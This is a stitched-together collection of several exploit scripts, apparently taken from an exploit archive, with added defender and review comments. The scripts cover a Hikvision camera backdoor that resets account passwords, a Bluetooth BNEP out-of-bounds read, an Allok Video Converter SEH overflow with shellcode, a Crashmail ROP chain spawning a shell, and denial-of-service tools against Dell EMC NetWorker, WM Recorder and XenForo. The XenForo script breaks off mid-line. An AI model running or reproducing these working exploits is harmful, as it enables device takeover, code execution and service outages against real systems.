# Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109) Backdoor
# Date: 15-03-2018
# Vendor Homepage: http://www.hikvision.com/en/
# Exploit Author: Matamorphosis
# Category: Web Apps
# Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109), deployed between 2014 and 2016, to assist the owner in recovering their password.
# Vulnerability Exploited: ICSA-17-124-01 - http://seclists.org/fulldisclosure/2017/Sep/23
#!/usr/bin/env python
# Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]
import requests
import re
import sys
# BASIC INFO
# NOTE(review): the replacement password is hard-coded and published together
# with this script, so any device it has been run against ends up with a
# publicly known credential. An owner who used it for recovery should set a
# new, private password straight afterwards.
newPass = "@Dm1N1$Tr80R" # EXAMPLE OF A PASSWORD COMPLIANT WITH LATER FIRMWARES REQUIRING AT LEAST 2 UPPERCASE, 2 lowercase, and 2 SPECIAL CHARACTERS.
# Fixed query-string value appended to both requests further down in place of
# normal credentials (the behaviour covered by ICSA-17-124-01). Because it
# never changes, the literal string is a usable indicator in web/proxy logs
# and IDS rules.
BackdoorAuthArg = "auth=YWRtaW46MTEK"; # AUTHENTICATION KEY.
# Placeholders; overwritten from the command line and the interactive prompts.
ip = ""
port = 0
SSL = ""
userID = ""
userName = ""
# Print the expected command-line arguments: address, port and a Y/N flag
# that selects HTTPS.
def Usage():
print("[i] Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]")
# Flat script body: parse the arguments, request the user list, then send a
# password-change request for the account the operator picks. Both requests
# rely on BackdoorAuthArg rather than on real credentials.
#
# Defender notes: the traffic produced is a GET to /Security/users followed by
# a PUT to /Security/users/<id>, each carrying the auth= parameter; either one
# in a camera's access log or at a network sensor is worth alerting on. The
# header lists firmware 5.2.0 - 5.3.9 as affected; the remedy is the vendor
# firmware update covered by ICSA-17-124-01, together with keeping the
# camera's web interface off untrusted networks.
try:
ip = sys.argv[1]
SSL = sys.argv[3]
except:
print("[-] One or more of the arguments is missing.")
Usage()
sys.exit()
# The pattern is unanchored and does not range-check the octets, so it only
# confirms that something shaped like a dotted quad appears in the argument.
ipmatch = re.search(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", ip) # IP ADDRESS REGULAR EXPRESSION.
if not ipmatch:
print("[-] The entered ip address " + ip + " is not in the correct format.")
Usage()
sys.exit()
try:
port = int(sys.argv[2])
except:
print("[-] The entered port " + sys.argv[2] + " is not a number.")
Usage()
sys.exit()
if (port == 0) or (port > 65535):
print("[-] The entered port " + sys.argv[2] + " is not a valid port number.")
Usage()
sys.exit()
# Anything other than an exact "Y" selects plain HTTP.
if SSL == "Y":
protocol = "https"
else:
protocol = "http"
URLBase = protocol + "://" + ip + ":" + str(port) + "/" # URL BASE FOR FUTURE REQUESTS.
URLDownload = URLBase + "Security/users?" + BackdoorAuthArg # DOWNLOAD REQUEST.
print("[+] Getting User List.")
DownloadResponse = requests.get(URLDownload).text
# Intended to print the <id>/<userName> values found in the response so the
# operator can choose an account.
for line in DownloadResponse: # RETRIEVING USER LIST
useridmatch = re.search(r"<id>(.*)<\/id>", line) # CHECK FOR USER ID.
usernamematch = re.search(r"<userName>(.*)<\/userName>", line) # CHECK FOR USER NAME.
if useridmatch:
userID = useridmatch.group(1)
print("[+] User ID: " + userID)
if usernamematch:
userName = usernamematch.group(1)
print("[+] Username: " + userName)
# raw_input is the Python 2 prompt function; the values typed here are used
# unmodified in the XML body and in the request URL.
userID = raw_input("[?] Which User ID would you like to use? ")
userName = raw_input("[?] Which Username would you like to use? ")
print("[+] Using the User " + userName + ".")
userXML = ( '<User version=""1.0"" xmlns=""http://www.hikvision.com/ver10/XMLSchema"">\r\n<id>' + userID + '</id>\r\n<userName>' + userName + '</userName>\r\n<password>' + newPass + '</password>\r\n</User>' ) # OUR CRAFTED XML CONFIGURATION FILE
#print(userXML)
URLUpload = URLBase + "Security/users/" + userID + "?" + BackdoorAuthArg # UPLOAD REQUEST.
print("[+] Changing Password now.")
print requests.put(URLUpload, data=userXML).text # UPLOAD REQUEST, SENDING THE PAYLOAD.
# The new password is echoed to the terminal in clear text, so it also ends up
# in scrollback and any session logging.
print("[+] Complete. Please try logging in with these credentials. Username: " + userName + "Password: " + newPass)
import os
import sys
import struct
import bluetooth
# L2CAP PSM that oob_read() connects to for BNEP.
BNEP_PSM = 15
# First byte of the frame sent by oob_read(): the BNEP "control" frame type.
BNEP_FRAME_CONTROL = 0x01
# Control types (parsed by bnep_process_control_packet() in bnep_utils.cc)
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01
# Connect to the remote BNEP service over L2CAP, send a two-byte control frame
# that stops before the length field, and print whatever comes back (at most
# 3 bytes).
#   src_bdaddr - local adapter address the socket is bound to
#   dst        - remote device address
# Defender note: per the inline comments, the receiving parser reads the
# missing 'len' byte from beyond the end of the packet. The fix belongs in
# that parser: verify the remaining packet length before reading each field.
# As the script's own message says, the read may not be observable without a
# debugger, so absence of returned data does not show a device is unaffected.
def oob_read(src_bdaddr, dst):
bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bnep.settimeout(5)
bnep.bind((src_bdaddr, 0))
print 'Connecting to BNEP...'
bnep.connect((dst, BNEP_PSM))
# Shorter timeout for the reply than for the connection attempt.
bnep.settimeout(1)
print "Triggering OOB read (you may need a debugger to verify that it's actually happening)..."
# This crafted BNEP packet just contains the BNEP_FRAME_CONTROL frame type,
# plus the BNEP_SETUP_CONNECTION_REQUEST_MSG control type.
# It doesn't include the 'len' field, therefore it is read from out of bounds
bnep.send(struct.pack('<BB', BNEP_FRAME_CONTROL, BNEP_SETUP_CONNECTION_REQUEST_MSG))
try:
data = bnep.recv(3)
except bluetooth.btcommon.BluetoothError:
# A Bluetooth error on receive (for example a timeout) is treated as "no data".
data = ''
if data:
print '%r' % data
else:
print '[No data]'
print 'Closing connection.'
bnep.close()
# Run two local Bluetooth utilities against the adapter and the remote
# address, then call oob_read().
#   src_hci - passed to hciconfig and also used as the bind address
#   dst     - remote device address
# NOTE(review): both values come straight from sys.argv and are interpolated
# into shell command lines through os.system while the script runs as root
# (enforced by the __main__ guard). Passing an argument list to subprocess
# instead would keep the shell from interpreting those arguments.
def main(src_hci, dst):
os.system('hciconfig %s sspmode 0' % (src_hci,))
os.system('hcitool dc %s' % (dst,))
oob_read(src_hci, dst)
# Entry point: needs two arguments and uid 0 (os.getuid() must return 0);
# otherwise it prints a usage or error line and does nothing else.
if __name__ == '__main__':
if len(sys.argv) < 3:
print('Usage: python bnep02.py <src-bdaddr> <dst-bdaddr>')
else:
if os.getuid():
print 'Error: This script must be run as root.'
else:
main(sys.argv[1], sys.argv[2])
# SWAMI KARUPASAMI THUNAI
###############################################################################
# Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date: 06-03-2018
# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj
# Organization : TwinTech Solutions
# Vulnerable Software: Allok Video Converter
# Vendor Homepage: http://www.alloksoft.com
# Version: 4.6.1217
# Software Link: http://www.alloksoft.com/allok_vconverter.exe
# Tested On: Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerability
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ...
#1. Download and install the "setup(allok_vconverter.exe)" file
#2. Run this exploit code via python 2.7
#3. A file "exploit.txt" will be created
#4. Copy the contents of the file and paste in the License Name field
# Name > exploit.txt
#5. Type some random character in License Code
#6. Click Register and voila !
#7. Boom calculator opens
#
##############################################################################
import struct
# Start of the generator for the License Name string described in the header;
# the pieces defined here are concatenated and written out further down.
# Defender notes: the header describes a buffer overflow reached by pasting
# this string into the License Name field, i.e. the registration dialog copies
# that field without a length check. The handler pointer below is a fixed
# address, so the technique presumably depends on a module that loads at a
# predictable base without SafeSEH - TODO confirm; the only platform the
# header lists as tested is Windows XP SP3. SafeSEH/SEHOP, ASLR and DEP are
# the relevant hardening controls, and a bounds check on the field is the fix.
file = open("exploit.txt","wb")
# Total length of the generated string.
buflen = 4000
# Filler placed ahead of the exception-handler record.
junk = "A" * 780
# Four-byte "next record" field of the handler record.
nseh = "\x90\x90\xeb\x10"
# Handler pointer, packed as a little-endian 32-bit value.
seh = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
# Concatenate the pieces, pad with "D" up to buflen bytes in total, write the
# result to exploit.txt and close the file. Nothing is sent anywhere; the file
# is pasted into the application by hand (see the steps in the header).
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
# Exploit author: Juan Sacco <jsacco@exploitpack.com>
# Website: http://exploitpack.com
#
# Description: Crashmail is prone to a stack-based buffer overflow because the application fails to perform adequate boundary checks on user supplied input.
# Impact: An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
# Vendor homepage: http://ftnapps.sourceforge.net/crashmail.html
# Affected version: 1.6 ( Latest )
import os, subprocess
from struct import pack
# p packs an integer as a native-order unsigned 32-bit value ('I' with no
# byte-order prefix).
p = lambda x : pack('I', x)
# Every address used further down is an offset added to this fixed load
# address, so the sequence only holds while the binary is mapped at
# 0x08048000, i.e. while it is not built as a position-independent
# executable. Building with PIE and stack protection, and fixing the
# unchecked copy described in the header, are the relevant countermeasures.
IMAGE_BASE_0 = 0x08048000 # ./crashmail
# rebase_0 turns an offset into a packed absolute address.
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
# Control of EIP at 216
# ROP chain: execve ( binsh )
# Static-linked
junk = 'A'*216 # Fill
ropchain = rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += '//bi'
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9060)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += 'n/sh'
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9064)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x000391a0) # 0x080811a0: xor eax, eax; ret;
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x000001f9) # 0x080481f9: pop ebx; ret;
ropchain += rebase_0(0x000e9060)
ropchain += rebase_0(0x000e0e80) # 0x08128e80: pop ecx; push cs; adc
al, 0x41; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x000705aa) # 0x080b85aaop edx; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += p(0xfffffff5)
ropchain += rebase_0(0x00051dc7) # 0x08099dc7: neg eax; ret;
ropchain += rebase_0(0x00070e80) # 0x080b8e80: int 0x80; ret;
evil_buffer = junk + ropchain
# Print a banner, then start ./crashmail from the current directory with the
# buffer as the argument that follows SETTINGS. An argument list is used, so
# no shell is involved.
# Defender note: the overflow is reached through a command-line argument;
# presumably exposure depends on what can influence crashmail's arguments or
# settings input - confirm against the application.
print "[*] Exploit Pack http://exploitpack.com - Author: jsacco@exploitpack.com"
print "[*] Crashmail 1.6 - BoF ( ROP execve)"
print "[?] Payload can be read trough a file or STDIN"
try:
subprocess.call(["./crashmail","SETTINGS", evil_buffer])
except OSError as e:
# ENOENT means the binary was not found; any other OSError is reported and
# re-raised.
if e.errno == os.errno.ENOENT:
print "[!] Crashmail not found"
else:
print "[*] Error executing exploit"
raise
'''
# Exploit Title: Dell EMC NetWorker DoS PoC
# Date: 18.03.2018
# Exploit Author: Marek Cybul
# Vendor Homepage: https://www.emc.com/data-protection/networker.htm
# Versions:
Dell EMC NetWorker versions prior to 9.2.1.1
Dell EMC NetWorker versions prior to 9.1.1.6
Dell EMC NetWorker 9.0.x
Dell EMC NetWorker versions prior to 8.2.4.11
# Tested on: 8.2.1.2.Build.764 and 9.1.0.4.Build.82 RHEL7
# CVE : CVE-2018-1218
http://seclists.org/fulldisclosure/2018/Mar/43
'''
#!/usr/bin/python
import sys, base64, socket, time
# Argument handling. With only an address, nsrd_port is set to 0, which the
# later code uses as the signal to search for the service; with an address
# and a port, the given port is used. `scan` is assigned but not read in the
# visible code.
scan = False
if len(sys.argv) < 2:
print "USAGE: ./emc_networker_dos.py <addr> <nsrd_port>"
sys.exit(1)
elif len(sys.argv) == 2:
nsrd_addr = str(sys.argv[1])
print "[i] Scanning for active nsrd service..."
nsrd_port = 0
else:
nsrd_addr = str(sys.argv[1])
nsrd_port = int(sys.argv[2])
part1 = """gAABBEoWuaoAAAAAAAAAAgAF890AAAACAAAAaAAAdT0AAAAIAAAAAVoVhWQAAAAAAAAAAAAAAAEA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"""
part2 = """gAABBEoWuaoAAAAAAAAAAgAF890AAAACAAAAaAAAdT0AAAAIAAAAAgAAAGgAAHU9AAAACAAAAAFa
FWVkdWxlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIABfPdAAAAAgAAAGgAAHU9AAAACAAAAAFa
FWVkdWxlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="""
hello = """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"""
# Service discovery, used only when no port was given: connect to each TCP
# port from 7000 to 9999 in turn, send the decoded `hello` message and treat
# a reply containing '111.111.1.111' as the nsrd service.
# Detection: this is a sequential sweep of 3000 ports from one source that
# sends the same payload to each, which flow logs and IDS port-scan
# heuristics pick up readily. Restricting the nsrd port range to known backup
# clients at the firewall reduces exposure to arbitrary hosts.
res = ''
if nsrd_port == 0:
for i in range(7000,10000):
try:
sys.stdout.write('.')
s = socket.socket()
s.connect((nsrd_addr, i))
s.send(base64.b64decode(hello))
res = s.recv(4096)
if '111.111.1.111' in res:
print "\n\033[31m[!] NSRD FOUND ON PORT: %d\033[0m" % i
nsrd_port = i
s.close()
break
s.close()
# Any failure on a port (refused, timeout, decode error) is ignored and the
# sweep moves on.
except Exception:
pass
# Send the two decoded messages on separate TCP connections (part1, then
# part2 after a one-second pause), reading up to 256 bytes of reply each time.
# Remediation: the header ties this to CVE-2018-1218 and lists releases prior
# to 9.2.1.1, 9.1.1.6 and 8.2.4.11, plus 9.0.x, as affected, so upgrading to
# at least those builds is the fix it implies - confirm against the vendor
# advisory. Presumably an nsrd process that stops right after two short-lived
# connections from an unfamiliar host matches this pattern.
print "\n[!] SENDING DOS PACKETS"
s = socket.socket()
s.connect((nsrd_addr, nsrd_port))
s.send(base64.b64decode(part1))
s.recv(256)
s.close()
time.sleep(1)
s = socket.socket()
s.connect((nsrd_addr, nsrd_port))
s.send(base64.b64decode(part2))
s.recv(256)
s.close()
print "\nDONE."
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: WM Recorder 16.8.1 - Denial of Service
# Date: 03-20-2018
# Vulnerable Software: WM Recorder 16.8.1
# Vendor Homepage: http://wmrecorder.com/home/
# Version: 16.8.1
# Software Link: http://wmrecorder.com/download/wm-recorder/
# Tested On: Windows 7 x86/x64, Windows 10 x64
#
#
# PoC: generate crash.txt, open app, go to Schedule Recordings, Open Scheduler, paste crash.txt contents in Stream URL, File name and Website URL,
# change End Recording date to future date, turn scheduler on, select OK
#
# app crashes & EIP overwrite;
# !mona seh > no ppr pointers & !mona seh -all > all aslr/safeseh
# lots of bad chars including \x90
#
# Write a 9999-character marker pattern to crash.txt: 429 'A', 4 'B', 4 'C'
# and 9562 'D'. There is no payload; the distinct letters only show which
# part of the input lands where when the application crashes.
# Defender note: the header reports an EIP overwrite but no usable SEH
# pointers because every module is ASLR/SafeSEH-protected, which is why this
# is filed as a denial of service. The underlying defect is still an
# unchecked copy of the scheduler text fields and should be fixed with a
# length check rather than left to those mitigations.
filename="crash.txt"
junk = "\x41"*429
nseh = "\x42"*4
seh = "\x43"*4
fill = "\x44"*9562
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
# Exploit Title: XenForo CSS Loader DoS
# Google Dork: intext:"Forum software by XenForo™" inurl:css.php ext:php
# Date: 22-03-18
# Exploit Author: LockedByte
# Vendor Homepage: https://xenforo.com/
# Software Link: https://xenforo.com/help/installation/
# Version: XenForo 2
# Tested on: Linux
# 0==================== { Exploit PoC } ====================0
import requests
import sys
import threading
import random
import re
import argparse
# Module-level state shared by the helpers below.
# host is assigned here but not read in the visible code.
host=''
# Pool of User-Agent strings, filled by useragent_list().
headers_useragents=[]
# Number of requests attempted so far (incremented before each send).
request_counter=0
# Status messages already shown, so printMsg() can skip repeats.
printedMsgs = []
# Print a status message tagged with the current request count; a message
# already present in printedMsgs is not printed again.
def printMsg(msg):
if msg not in printedMsgs:
print "\n"+msg + " after %i requests" % request_counter
printedMsgs.append(msg)
# Append a fixed set of twelve User-Agent strings to the module-level list and
# return that list.
# Detection: the set is static and dated (the Gecko build dates are from
# 2009; the rest are MSIE 6-8, Chrome 4 and Opera 10.51), so a high-rate
# stream of css.php requests rotating among exactly these values is
# straightforward to fingerprint and block at the edge.
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
# Return `size` random uppercase ASCII letters (code points 65-90), each drawn
# with random.randint.
def randomString(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
# Build the header set for one request: a random User-Agent from the fixed
# list, Cache-Control: no-cache, a Referer of http://www.google.com/?q=
# followed by 5-10 random uppercase letters, and a Keep-Alive value between
# 110 and 120. Any additionalHeaders entries are split on ":" and merged in.
# Detection and mitigation: the Referer shape and the Keep-Alive range stay
# the same across requests and make a practical signature alongside the
# repeated css.php URL. The no-cache directive is presumably there to get past
# caches, so serving the CSS endpoint from a cache that does not honour client
# cache directives, plus per-client rate limiting, blunts the load.
def initHeaders():
useragent_list()
global headers_useragents, additionalHeaders
headers = {
'User-Agent': random.choice(headers_useragents),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Referer': 'http://www.google.com/?q=' + randomString(random.randint(5,10)),
'Keep-Alive': str(random.randint(110,120)),
'Connection': 'keep-alive'
}
if additionalHeaders:
for header in additionalHeaders:
headers.update({header.split(":")[0]:header.split(":")[1]})
return headers
# Rewrite the running request count on the current terminal line, then react
# to two status codes.
# 429 is reported as throttling, i.e. server- or edge-side rate limiting is
# the control the tool is running into at that point.
# NOTE(review): the 500 branch calls `printedMsg`, which is not defined in the
# visible code (the helper is `printMsg`, the list is `printedMsgs`).
def handleStatusCodes(status_code):
global request_counter
sys.stdout.write("\r%i requests has been sent" % request_counter)
sys.stdout.flush()
if status_code == 429:
printMsg("You have been throttled")
if status_code == 500:
printedMsg("Status code 500 received")
# Issue one GET to `url` with freshly built headers and hand the status code
# to handleStatusCodes(). The counter is incremented before the request is
# sent, so it counts attempts rather than completed requests.
# The bare except discards every error, so failures are silent.
def sendGET(url):
global request_counter
headers = initHeaders()
try:
request_counter+=1
request = requests.get(url, headers=headers)
# print 'her'
handleStatusCodes(request.status_code)
except:
pass
# Issue one POST to `url` with freshly built headers, attaching `payload` as
# the request body when it is truthy, and hand the status code to
# handleStatusCodes(). As in sendGET(), the counter is incremented before the
# request is sent and the bare except discards every error.
def sendPOST(url, payload):
global request_counter
headers = initHeaders()
try:
request_counter+=1
if payload:
request = requests.post(url, data=payload, headers=headers)
else:
request = requests.post(url, headers=headers)
handleStatusCodes(request.status_code)
except:
pass
# Worker thread that calls sendGET(url) in an endless loop, reading the
# module-level `url`. Any exception ends the loop silently. There is no stop
# condition or delay between iterations in the visible code.
class SendGETThread(threading.Thread):
def run(self):
try:
while True:
global url
sendGET(url)
except:
pass
# Worker thread that calls sendPOST(url, payload) in an endless loop, reading
# the module-level `url` and `payload`. Any exception ends the loop silently.
# There is no stop condition or delay between iterations in the visible code.
class SendPOSTThread(threading.Thread):
def run(self):
try:
while True:
global url, payload
sendPOST(url, payload)
except:
pass
# TODO:
# check if the site stop responding and alert
# Entry point: parse the command line and publish the options as module-level
# globals that the worker threads and initHeaders() read.
# `argv` is accepted but not used; parse_args() is called without arguments and
# therefore reads sys.argv itself.
def main(argv):
parser = argparse.ArgumentParser(description='XenForo CSS Load DoS Exploit PoC. By LockedByte \n Common Usage: python poc.py -u domain.com -c /css.php -t 500')
# -u and -c are concatenated into the GET URL further down; neither has a default.
parser.add_argument('-u', help='Target Domain. Usage: -u \'<domain>\'')
parser.add_argument('-c', help='CSS Loader (/css.php) Path. Usage: -c \'<path>\'')
# -p switches to POST mode and is used as the full request URL.
parser.add_argument('-p', help='Use this only if the PHP file use POST Requests. PHP POST URL. Usage: -p \'<url>\'')
parser.add_argument('-d', help='Use this only if the PHP file use POST Requests. POST DATA.', default=None)
# nargs='*' collects zero or more 'Name: value' strings into a list.
parser.add_argument('-ah', help='Use this only if you want to use different CSS Loads. Additional headers. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
# Worker count; 500 threads unless overridden.
parser.add_argument('-t', help='Number of threads to be used', default=500, type=int)
args = parser.parse_args()
# Shared state: the workers read url and payload, initHeaders() reads additionalHeaders.
global url, payload, additionalHeaders
additionalHeaders = args.ah
payload = args.d
if args.u:
url = 'http://' + args.u + args.c + '?css=xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,not
ices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login
